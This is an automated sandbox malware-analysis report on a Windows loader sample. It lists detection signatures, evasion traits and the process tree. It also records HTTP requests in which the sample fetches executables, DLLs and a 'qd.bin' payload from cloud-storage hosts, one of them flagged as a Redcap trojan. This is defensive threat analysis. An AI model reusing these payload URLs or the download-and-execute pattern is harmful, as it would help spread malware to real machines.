Edit tour

Windows Analysis Report
LisectAVT_2403002B_246.exe

Overview

General Information

Sample name:	LisectAVT_2403002B_246.exe
Analysis ID:	1481908
MD5:	8b5eb95f4a065ebf2719fe29321ca7ff
SHA1:	7eca9aca802512fe345f55bb5aa969f384f3e934
SHA256:	3754d6f495a00c1b11dc4da5a975d3876303071f3238307e4225e0ce392c02c5
Tags:	exe
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LisectAVT_2403002B_246.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_246.exe" MD5: 8B5EB95F4A065EBF2719FE29321CA7FF)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T16:04:45.684505+0200
SID:	2022930
Source Port:	443
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 43.153.232.151 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T16:04:34.377932+0200
SID:	2011803
Source Port:	443
Destination Port:	49733
Protocol:	TCP
Classtype:	Executable code was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T16:05:24.036708+0200
SID:	2022930
Source Port:	443
Destination Port:	49751
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002B_246.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Everything\app_core_legacy.dll	Avira: detection malicious, Label: TR/Redcap.jxchs
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	Avira: detection malicious, Label: TR/Redcap.jxchs

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Everything\app_core_legacy.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002B_246.exe

Joe Sandbox ML: detected

Source: LisectAVT_2403002B_246.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.75.57.36:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: LisectAVT_2403002B_246.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wabmig.pdbGCTL source: LisectAVT_2403002B_246.exe
Source:	Binary string: wabmig.pdb source: LisectAVT_2403002B_246.exe
Source:	Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source:	Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source:	Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: C:\Users\Administrator\source\repos\MSASN1\Release\MSASN1.pdb source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.000000000064C000.00000004.00000020.00020000.00000000.sdmp, app_core_legacy.dll.0.dr, MSASN1[1].dll.0.dr

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EEDEE2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

0_2_00EEDEE2

Source: Joe Sandbox View	IP Address: 159.75.57.36 159.75.57.36
Source: Joe Sandbox View	IP Address: 43.153.232.151 43.153.232.151
Source: Joe Sandbox View	IP Address: 43.152.64.207 43.152.64.207

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /PluginLauncher.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /MSASN1.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00ED3150 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,

0_2_00ED3150

Source: global traffic	HTTP traffic detected: GET /PluginLauncher.exe HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /MSASN1.dll HTTP/1.1User-Agent: Mozilla/5.0Host: www80-1323570959.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: loaderHost: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: www80-1323570959.cos.ap-singapore.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com

Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1833700896.000000000064C000.00000004.00000020.00020000.00000000.sdmp, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0L
Source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: LisectAVT_2403002B_246.exe, PluginLauncher[1].exe.0.dr, Everything.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/A
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllH
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllQ
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllh
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dllll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllle
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/MSASN1.dlllls
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/g
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www80-1323570959.cos.ap-singapore.myqcloud.com/p
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.a
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.aF
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/L
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exe0
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/PluginLauncher.exeha
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlles
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllj
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll3
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/s
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000620000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/y
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1868271376.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/yh
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.1900988632.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1922522259.0000000000659000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000003.1945737469.000000000064C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/z
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/4
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/R
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/g
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_246.exe, 00000000.00000003.2022424081.0000000000653000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194707553.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin%6
Source: LisectAVT_2403002B_246.exe	String found in binary or memory: https://wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com/qd.binloaderaHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1O

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

